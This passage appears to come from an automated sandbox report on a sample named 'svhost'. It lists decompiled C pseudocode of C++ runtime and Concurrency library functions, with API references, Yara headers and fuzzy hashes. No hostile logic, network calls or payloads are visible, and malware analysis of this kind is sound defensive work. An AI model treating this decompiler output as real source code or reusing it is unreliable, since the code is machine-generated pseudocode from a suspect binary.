                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				intOrPtr* _v32;
                                      				intOrPtr* _v36;
                                      				char _v40;
                                      				signed int _t28;
                                      				signed int _t29;
                                      				void* _t47;
                                      				void* _t67;
                                      				void* _t68;
                                      				signed int _t69;
                                      
                                      				_t68 = __esi;
                                      				_t67 = __edi;
                                      				_t64 = __edx;
                                      				_t47 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xebffe8);
                                      				_push( *[fs:0x0]);
                                      				_t28 =  *0xeef074; // 0x221cac15
                                      				_t29 = _t28 ^ _t69;
                                      				_v20 = _t29;
                                      				_push(_t29);
                                      				 *[fs:0x0] =  &_v16;
                                      				if(_a12 != 0xffffffff) {
                                      					E00E515C0( &_v28, 8);
                                      					E00E572F0(E00E528C0());
                                      					_v8 = 0;
                                      					if((E00E56E90( &_v28) & 0x000000ff) == 0) {
                                      						_v40 = 0;
                                      						_v36 = E00E53640( &_v40);
                                      						_t64 =  *_v36;
                                      						 *((intOrPtr*)( *((intOrPtr*)( *_v36))))(_a4, _a8);
                                      					} else {
                                      						_v32 = E00E5A440( &_v28);
                                      						_t64 =  *_v32;
                                      						 *((intOrPtr*)( *((intOrPtr*)( *_v32))))(_a4, _a8);
                                      					}
                                      					_v8 = 0xffffffff;
                                      					E00E56EC0();
                                      				} else {
                                      					_a4(_a8);
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t47, _v20 ^ _t69, _t64, _t67, _t68);
                                      			}

                                      APIs
                                      • shared_ptr.LIBCPMTD ref: 00E53560
                                      • Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores.LIBCMTD ref: 00E5356F
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E535CA
                                      Yara matches
                                      Similarity
                                      • API ID: Base::ChoresConcurrency::details::Container_base12Container_base12::~_GroupScheduleSegmentUnrealizedshared_ptrstd::_
                                      • String ID:
                                      • API String ID: 2982896290-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00EB1054(void* __ecx) {
                                      				intOrPtr _t2;
                                      				signed int _t3;
                                      				signed int _t13;
                                      				signed int _t18;
                                      				long _t21;
                                      
                                      				_t21 = GetLastError();
                                      				_t2 =  *0xeef2c0; // 0x6
                                      				_t24 = _t2 - 0xffffffff;
                                      				if(_t2 == 0xffffffff) {
                                      					L6:
                                      					_t3 = E00EB163C(__eflags, _t2, 0xffffffff);
                                      					__eflags = _t3;
                                      					if(_t3 == 0) {
                                      						goto L3;
                                      					} else {
                                      						_t18 = E00EB04C2(1, 0x364);
                                      						__eflags = _t18;
                                      						if(__eflags != 0) {
                                      							__eflags = E00EB163C(__eflags,  *0xeef2c0, _t18);
                                      							if(__eflags != 0) {
                                      								E00EB0D2A(_t18, 0xef373c);
                                      								E00EB051F(0);
                                      								goto L13;
                                      							} else {
                                      								_t13 = 0;
                                      								E00EB163C(__eflags,  *0xeef2c0, 0);
                                      								_push(_t18);
                                      								goto L9;
                                      							}
                                      						} else {
                                      							_t13 = 0;
                                      							__eflags = 0;
                                      							E00EB163C(0,  *0xeef2c0, 0);
                                      							_push(0);
                                      							L9:
                                      							E00EB051F();
                                      							goto L4;
                                      						}
                                      					}
                                      				} else {
                                      					_t18 = E00EB15FD(_t24, _t2);
                                      					if(_t18 == 0) {
                                      						_t2 =  *0xeef2c0; // 0x6
                                      						goto L6;
                                      					} else {
                                      						if(_t18 != 0xffffffff) {
                                      							L13:
                                      							_t13 = _t18;
                                      						} else {
                                      							L3:
                                      							_t13 = 0;
                                      							L4:
                                      							_t18 = _t13;
                                      						}
                                      					}
                                      				}
                                      				SetLastError(_t21);
                                      				asm("sbb edi, edi");
                                      				return  ~_t18 & _t13;
                                      			}

                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,00EA5F5C,00EB059C,?,?,00E89C45,00000000,?,00E5166C,00000000,?,00E5B6DC,00000000), ref: 00EB1059
                                      • _free.LIBCMT ref: 00EB10B6
                                      • _free.LIBCMT ref: 00EB10EC
                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00EA5F5C,00EB059C,?,?,00E89C45,00000000,?,00E5166C,00000000), ref: 00EB10F7
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_free
                                      • String ID:
                                      • API String ID: 2283115069-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00E53DE0(intOrPtr __ecx, void* __eflags) {
                                      				char _v8;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				signed int _t20;
                                      				signed int _t46;
                                      				void* _t47;
                                      				void* _t52;
                                      
                                      				_t52 = __eflags;
                                      				_push(0xffffffff);
                                      				_push(0xec011e);
                                      				_push( *[fs:0x0]);
                                      				_t20 =  *0xeef074; // 0x221cac15
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = __ecx;
                                      				_v24 = _t47 - 4;
                                      				E00E572F0(E00E528C0());
                                      				_v28 = E00E524B0(_v20, _t52, _t20 ^ _t46);
                                      				_v8 = 0;
                                      				E00E53090(_v20, _v20 + 0xc);
                                      				_v8 = 1;
                                      				E00E53CF0(_v20 + 0x10);
                                      				_v8 = 2;
                                      				E00E53D90(_v20 + 0x18);
                                      				 *((char*)(_v20 + 0x2c)) = 0;
                                      				 *((char*)(_v20 + 0x2d)) = 0;
                                      				_v8 = 0xffffffff;
                                      				 *[fs:0x0] = _v16;
                                      				return _v20;
                                      			}

                                      APIs
                                      • shared_ptr.LIBCPMTD ref: 00E53E19
                                        • Part of subcall function 00E572F0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00E57319
                                        • Part of subcall function 00E572F0: _Copy_construct_from.LIBCPMTD ref: 00E57325
                                      • Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E53E21
                                        • Part of subcall function 00E524B0: shared_ptr.LIBCPMTD ref: 00E524C7
                                        • Part of subcall function 00E524B0: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E524DD
                                      • Concurrency::cancellation_token::none.LIBCPMTD ref: 00E53E37
                                      • Concurrency::details::_Internal_task_options::_Internal_task_options.LIBCPMTD ref: 00E53E5C
                                        • Part of subcall function 00E53D90: Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack.LIBCPMTD ref: 00E53D9D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_CreationTaskshared_ptrstd::_$CallstackCallstack::_Concurrency::cancellation_token::noneConcurrency::scheduler_ptr::scheduler_ptrContainer_base12Container_base12::~_Copy_construct_fromInternal_task_optionsInternal_task_options::_Iterator_baseIterator_base::_
                                      • String ID:
                                      • API String ID: 1982005772-0
                                      • Opcode ID: d88071a8d93b265dc4ec28fe8c397ea6a4eca355e712b620cddabb4ceddacdb7
                                      • Instruction ID: 828454b30997b63d3d5292947561c13d0f6053712c10eb769ed95579ad9114e6
                                      • Opcode Fuzzy Hash: d88071a8d93b265dc4ec28fe8c397ea6a4eca355e712b620cddabb4ceddacdb7
                                      • Instruction Fuzzy Hash: D41142B1D04259DBCB04EFA8DD46BAFBBF4FB05314F044A69E811B7382D7756A048B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                      			E00E58760(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a4) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				signed int _t21;
                                      				signed int _t22;
                                      				signed char _t27;
                                      				void* _t34;
                                      				void* _t52;
                                      				void* _t53;
                                      				signed int _t54;
                                      
                                      				_t53 = __esi;
                                      				_t52 = __edi;
                                      				_t34 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec06d8);
                                      				_push( *[fs:0x0]);
                                      				_t21 =  *0xeef074; // 0x221cac15
                                      				_t22 = _t21 ^ _t54;
                                      				_v20 = _t22;
                                      				_push(_t22);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v28 = __ecx;
                                      				E00E586E0(_v28 + 0xd0,  &_a4);
                                      				E00E57780( &_v24, _v28 + 0x14);
                                      				_v8 = 0;
                                      				_t27 = E00E54650(_v28);
                                      				_t51 = _t27 & 0x000000ff;
                                      				if((_t27 & 0x000000ff) == 0) {
                                      					 *((intOrPtr*)(_v28 + 4)) = 3;
                                      					_v8 = 0xffffffff;
                                      					E00E57740();
                                      					E00E534F0(_v28 + 0x50);
                                      					E00E54BC0(_v28);
                                      				} else {
                                      					_v8 = 0xffffffff;
                                      					E00E57740();
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t34, _v20 ^ _t54, _t51, _t52, _t53);
                                      			}

                                      APIs
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E587A7
                                      • Concurrency::details::_Task_impl_base::_IsCanceled.LIBCPMTD ref: 00E587B6
                                      • SafeRWList.LIBCONCRTD ref: 00E587CC
                                      • SafeRWList.LIBCONCRTD ref: 00E587E7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_ListSafe$CanceledCriticalLock::_ReentrantScoped_lockScoped_lock::_Task_impl_base::_
                                      • String ID:
                                      • API String ID: 4001845217-0
                                      • Opcode ID: 32ae1d562184e39bbb6ecd0e6ae6f66490a16aec8e103309213e09f12e5733f5
                                      • Instruction ID: 3da2879307f965f681ab1dacbca5fce515d1090c419e1790c1d1019ab01792a8
                                      • Opcode Fuzzy Hash: 32ae1d562184e39bbb6ecd0e6ae6f66490a16aec8e103309213e09f12e5733f5
                                      • Instruction Fuzzy Hash: DA115B709041099BCB08EF98D952BBEBBB5EF44315F10562AE9267B2C2DF305A08CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00E58540(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, char _a4, signed char _a12) {
                                      				char _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				signed int _t21;
                                      				signed int _t50;
                                      				void* _t51;
                                      
                                      				_push(0xffffffff);
                                      				_push(0xec06a0);
                                      				_t21 =  *0xeef074; // 0x221cac15
                                      				_v20 = _t21 ^ _t50;
                                      				 *[fs:0x0] =  &_v16;
                                      				_v32 = __ecx;
                                      				_v8 = 0;
                                      				E00E515C0( &_v28, 8);
                                      				E00E57830( &_v28, _v32 + 0x14);
                                      				_v8 = 1;
                                      				_v36 = _t51 - 0xc;
                                      				E00E51430( &_a4);
                                      				E00E59CC0(_v32,  &_v28, _a12 & 0x000000ff, _t21 ^ _t50,  *[fs:0x0]);
                                      				_v8 = 0;
                                      				E00E577E0();
                                      				_v8 = 0xffffffff;
                                      				E00E513E0();
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(__ebx, _v20 ^ _t50,  &_v28, __edi, __esi);
                                      			}

                                      APIs
                                      • unique_lock.LIBCONCRTD ref: 00E58586
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E585A4
                                        • Part of subcall function 00E59CC0: std::make_error_code.LIBCPMTD ref: 00E59D00
                                        • Part of subcall function 00E59CC0: std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E59D18
                                        • Part of subcall function 00E59CC0: std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E59D3D
                                      • ~unique_lock.LIBCONCRTD ref: 00E585B8
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E585C7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception_ptr::exception_ptrstd::exception_ptr::~exception_ptr$std::make_error_codeunique_lock~unique_lock
                                      • String ID:
                                      • API String ID: 956333363-0
                                      • Opcode ID: b356943ef642f5fffa0a0b0a3a92ebd2b446bbcd5d6354ce69e261b519969d05
                                      • Instruction ID: b9f0d7c44bec0449a2a074c82e5a28746f834690b5a864d22e8d62efa6ea0eb8
                                      • Opcode Fuzzy Hash: b356943ef642f5fffa0a0b0a3a92ebd2b446bbcd5d6354ce69e261b519969d05
                                      • Instruction Fuzzy Hash: 04114F71D04249DBCF04EFA8D852BEEBBB4EB04710F40466DE926772C2DB346609CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E5D8B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                      				intOrPtr* _v8;
                                      				char _v16;
                                      				char _v24;
                                      				char _v44;
                                      				char _v64;
                                      				signed int _t14;
                                      				intOrPtr* _t19;
                                      				void* _t36;
                                      
                                      				_t35 = __esi;
                                      				_t34 = __edi;
                                      				_t23 = __ebx;
                                      				_v8 = __ecx;
                                      				_t38 =  *_v8;
                                      				if( *_v8 == 0) {
                                      					_t19 = E00E51D70( &_v16, _t38,  &_v16, 1);
                                      					_t36 = _t36 + 8;
                                      					E00E51F50(__ebx,  &_v44, __edi, __esi,  *_t19,  *((intOrPtr*)(_t19 + 4)));
                                      					E00EA0C81( &_v44, 0xeeda54);
                                      				}
                                      				_t14 =  *(_v8 + 4) & 0x000000ff;
                                      				_t39 = _t14;
                                      				if(_t14 != 0) {
                                      					E00E51F50(_t23,  &_v64, _t34, _t35,  *((intOrPtr*)(E00E51D70( &_v24, _t39,  &_v24, 0x24))),  *((intOrPtr*)(_t15 + 4)));
                                      					return E00EA0C81( &_v64, 0xeeda54);
                                      				}
                                      				return _t14;
                                      			}

                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5D8E7
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      • std::make_error_code.LIBCPMTD ref: 00E5D8C7
                                        • Part of subcall function 00E51D70: std::generic_category.LIBCPMTD ref: 00E51D73
                                        • Part of subcall function 00E51D70: _Smanip.LIBCPMTD ref: 00E51D80
                                        • Part of subcall function 00E51F50: task.LIBCPMTD ref: 00E51FAA
                                      • std::make_error_code.LIBCPMTD ref: 00E5D8FD
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5D91D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throwstd::make_error_code$ExceptionRaiseSmanipstd::generic_categorytask
                                      • String ID:
                                      • API String ID: 795452861-0
                                      • Opcode ID: 335530b565007d14339376e8997b36f6e098b6c77b936970dbbb0a714e1fe323
                                      • Instruction ID: 1981b3543056f5feedafb324a6cf6fce89860f8583ac06c210e72d093860c687
                                      • Opcode Fuzzy Hash: 335530b565007d14339376e8997b36f6e098b6c77b936970dbbb0a714e1fe323
                                      • Instruction Fuzzy Hash: 53014471E04208AFC714EB90DC41F9EB7B8AF59301F44A698F90877191EB71EA0CCBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00E51540(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* _a4) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				signed int _t13;
                                      				signed int _t14;
                                      				signed int _t37;
                                      				void* _t41;
                                      
                                      				_t41 = __eflags;
                                      				_push(0xffffffff);
                                      				_push(0xebfcd0);
                                      				_push( *[fs:0x0]);
                                      				_t13 =  *0xeef074; // 0x221cac15
                                      				_t14 = _t13 ^ _t37;
                                      				_v20 = _t14;
                                      				_push(_t14);
                                      				 *[fs:0x0] =  &_v16;
                                      				E00E515C0( &_v28, 8);
                                      				E00E51390();
                                      				E00E7175D( &_v28, __edx, _t41,  &_v28);
                                      				E00E51430( &_v28);
                                      				E00E513E0();
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(__ebx, _v20 ^ _t37, __edx, __edi, __esi);
                                      			}

                                      APIs
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E51575
                                      • __ExceptionPtrCurrentException.LIBCPMT ref: 00E5157E
                                        • Part of subcall function 00E7175D: std::_Ref_count_base::_Decref.LIBCMTD ref: 00E71781
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E5158D
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E51595
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exceptionstd::exception_ptr::exception_ptr$CurrentDecrefRef_count_base::_std::_std::exception_ptr::~exception_ptr
                                      • String ID:
                                      • API String ID: 4047371041-0
                                      • Opcode ID: 3ebfe900c10761419f67575ffafbe1b6d5b52c633c8cd936885854ac0a7b6ddf
                                      • Instruction ID: d969cd5a4cf267615804195d336973ce5ec866b77a9b80f70f7a92b2d717d4d6
                                      • Opcode Fuzzy Hash: 3ebfe900c10761419f67575ffafbe1b6d5b52c633c8cd936885854ac0a7b6ddf
                                      • Instruction Fuzzy Hash: E6014F7190410C9BCB08EFA4D892BBEB7B8EB04710F4056A9F916A76C1EB346548CA80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EBEC67(void* _a4, long _a8, DWORD* _a12) {
                                      				void* _t13;
                                      
                                      				_t13 = WriteConsoleW( *0xeefa60, _a4, _a8, _a12, 0);
                                      				if(_t13 == 0 && GetLastError() == 6) {
                                      					E00EBEC50();
                                      					E00EBEC12();
                                      					_t13 = WriteConsoleW( *0xeefa60, _a4, _a8, _a12, _t13);
                                      				}
                                      				return _t13;
                                      			}

                                      APIs
                                      • WriteConsoleW.KERNEL32(00E62ABC,00000008,000000FF,00000000,00E62ABC,?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC), ref: 00EBEC7E
                                      • GetLastError.KERNEL32(?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000,00E62ABC,?,00EBAA6C,00E6118D), ref: 00EBEC8A
                                        • Part of subcall function 00EBEC50: CloseHandle.KERNEL32(FFFFFFFE,00EBEC9A,?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000,00E62ABC), ref: 00EBEC60
                                      • ___initconout.LIBCMT ref: 00EBEC9A
                                        • Part of subcall function 00EBEC12: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EBEC41,00EBE088,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000), ref: 00EBEC25
                                      • WriteConsoleW.KERNEL32(00E62ABC,00000008,000000FF,00000000,?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000), ref: 00EBECAF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: 8a69bf4334547e69a9499a32b97a10fa78c7472154027d5584fbf0e780b51459
                                      • Instruction ID: 4fabda249314f48812b7feae45ccd0b0b2a850233d1c6ef3fd1a3704ad585701
                                      • Opcode Fuzzy Hash: 8a69bf4334547e69a9499a32b97a10fa78c7472154027d5584fbf0e780b51459
                                      • Instruction Fuzzy Hash: 97F01236040158BFCF121FA2EC05DCA7F65FB543A0B114120FA1DB5260C632C964AB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E00E725A3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr _v24;
                                      				signed int _v28;
                                      				char _v32;
                                      				char _v44;
                                      				intOrPtr* _v48;
                                      				void* _t21;
                                      				intOrPtr _t28;
                                      				intOrPtr* _t37;
                                      				intOrPtr* _t38;
                                      				void* _t45;
                                      				intOrPtr* _t48;
                                      
                                      				_t21 = E00E686D0(__ecx);
                                      				E00E51BB0( &_v12, GetLastError(), _t21);
                                      				_t37 =  &_v32;
                                      				E00E51F50(__ebx, _t37, __edi, _t21, _v12, _v8);
                                      				E00EA0C81( &_v32, 0xeeda54);
                                      				asm("int3");
                                      				_push(0x20);
                                      				E00E8A38B();
                                      				_t48 = _t37;
                                      				_v48 = _t48;
                                      				_t43 = _a12;
                                      				_t38 = _a12;
                                      				_v28 = _v28 & 0x00000000;
                                      				_v48 = _t48;
                                      				_v24 = 0xf;
                                      				_v44 = 0;
                                      				_t45 = _t38 + 1;
                                      				do {
                                      					_t28 =  *_t38;
                                      					_t38 = _t38 + 1;
                                      				} while (_t28 != 0);
                                      				E00E597D0( &_v44, _t45, _t48, _t43, _t38 - _t45);
                                      				_v8 = _v8 & 0x00000000;
                                      				E00E51E50(__ebx, _t48, _t45, _t48, _a4, _a8,  &_v44);
                                      				E00E595D0( &_v44);
                                      				 *_t48 = 0xec44f0;
                                      				E00E8A346();
                                      				return _t48;
                                      			}

                                      APIs
                                      • std::generic_category.LIBCPMTD ref: 00E725AA
                                        • Part of subcall function 00E686D0: _Immortalize.LIBCPMTD ref: 00E686F2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00E5A37D), ref: 00E725B1
                                      • _Smanip.LIBCPMTD ref: 00E725BC
                                        • Part of subcall function 00E51F50: task.LIBCPMTD ref: 00E51FAA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E725D8
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorExceptionException@8ImmortalizeLastRaiseSmanipThrowstd::generic_categorytask
                                      • String ID:
                                      • API String ID: 2093893244-0
                                      • Opcode ID: 31c8ae353989f73419a5a06a0d420204af703dd63cb834ca46f7711c0fc38bea
                                      • Instruction ID: f1bf3985b81f365bb1349bddc3ec4dad2a1777734e7776dc3b387e5e3b088386
                                      • Opcode Fuzzy Hash: 31c8ae353989f73419a5a06a0d420204af703dd63cb834ca46f7711c0fc38bea
                                      • Instruction Fuzzy Hash: BFE0B671C0411DAB8B01BBE1CC1ADDFBABCAE14340B0025A4BA1572056EA64661E96A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00EB6DED(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				char _v22;
                                      				char _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t51;
                                      				signed int _t60;
                                      				signed int _t61;
                                      				short _t64;
                                      				signed char _t66;
                                      				signed int _t67;
                                      				signed char* _t76;
                                      				signed char* _t77;
                                      				int _t79;
                                      				signed int _t84;
                                      				signed char* _t85;
                                      				short* _t86;
                                      				signed int _t87;
                                      				signed char _t88;
                                      				signed int _t89;
                                      				void* _t90;
                                      				signed int _t91;
                                      				signed int _t92;
                                      				short _t93;
                                      				signed int _t94;
                                      				intOrPtr _t96;
                                      				signed int _t97;
                                      
                                      				_t90 = __edx;
                                      				_t51 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t51 ^ _t97;
                                      				_t96 = _a8;
                                      				_t79 = E00EB6982(__eflags, _a4);
                                      				if(_t79 == 0) {
                                      					L36:
                                      					E00EB69F3(_t96);
                                      					goto L37;
                                      				} else {
                                      					_t93 = 0;
                                      					_t84 = 0;
                                      					_t57 = 0;
                                      					_v32 = 0;
                                      					while( *((intOrPtr*)(_t57 + 0xeef870)) != _t79) {
                                      						_t84 = _t84 + 1;
                                      						_t57 = _t57 + 0x30;
                                      						_v32 = _t84;
                                      						if(_t57 < 0xf0) {
                                      							continue;
                                      						} else {
                                      							if(_t79 == 0xfde8 || IsValidCodePage(_t79 & 0x0000ffff) == 0) {
                                      								L22:
                                      							} else {
                                      								if(_t79 != 0xfde9) {
                                      									_t13 =  &_v28; // 0xeb6c3b
                                      									_t57 = GetCPInfo(_t79, _t13);
                                      									__eflags = _t57;
                                      									if(_t57 == 0) {
                                      										__eflags =  *0xef3a48 - _t93; // 0x0
                                      										if(__eflags != 0) {
                                      											goto L36;
                                      										} else {
                                      											goto L22;
                                      										}
                                      									} else {
                                      										_t14 = _t96 + 0x18; // 0xeba1b7
                                      										E00EA1270(_t93, _t14, _t93, 0x101);
                                      										 *(_t96 + 4) = _t79;
                                      										__eflags = _v28 - 2;
                                      										 *((intOrPtr*)(_t96 + 0x21c)) = _t93;
                                      										if(_v28 == 2) {
                                      											__eflags = _v22;
                                      											_t76 =  &_v22;
                                      											if(_v22 != 0) {
                                      												while(1) {
                                      													_t88 = _t76[1];
                                      													__eflags = _t88;
                                      													if(_t88 == 0) {
                                      														goto L18;
                                      													}
                                      													_t91 = _t88 & 0x000000ff;
                                      													_t89 =  *_t76 & 0x000000ff;
                                      													while(1) {
                                      														__eflags = _t89 - _t91;
                                      														if(_t89 > _t91) {
                                      															break;
                                      														}
                                      														 *(_t96 + _t89 + 0x19) =  *(_t96 + _t89 + 0x19) | 0x00000004;
                                      														_t89 = _t89 + 1;
                                      														__eflags = _t89;
                                      													}
                                      													_t76 =  &(_t76[2]);
                                      													__eflags =  *_t76;
                                      													if( *_t76 != 0) {
                                      														continue;
                                      													}
                                      													goto L18;
                                      												}
                                      											}
                                      											L18:
                                      											_t25 = _t96 + 0x1a; // 0xeba1b9
                                      											_t77 = _t25;
                                      											_t87 = 0xfe;
                                      											do {
                                      												 *_t77 =  *_t77 | 0x00000008;
                                      												_t77 =  &(_t77[1]);
                                      												_t87 = _t87 - 1;
                                      												__eflags = _t87;
                                      											} while (_t87 != 0);
                                      											_t26 = _t96 + 4; // 0xc033a47d
                                      											 *((intOrPtr*)(_t96 + 0x21c)) = E00EB6944( *_t26);
                                      											_t93 = 1;
                                      										}
                                      										goto L8;
                                      									}
                                      								} else {
                                      									 *(_t96 + 4) = 0xfde9;
                                      									 *((intOrPtr*)(_t96 + 0x21c)) = _t93;
                                      									 *((intOrPtr*)(_t96 + 0x18)) = _t93;
                                      									 *((short*)(_t96 + 0x1c)) = _t93;
                                      									L8:
                                      									 *((intOrPtr*)(_t96 + 8)) = _t93;
                                      									_t12 = _t96 + 0xc; // 0xeba1ab
                                      									_t93 = _t12;
                                      									asm("stosd");
                                      									asm("stosd");
                                      									asm("stosd");
                                      									L9:
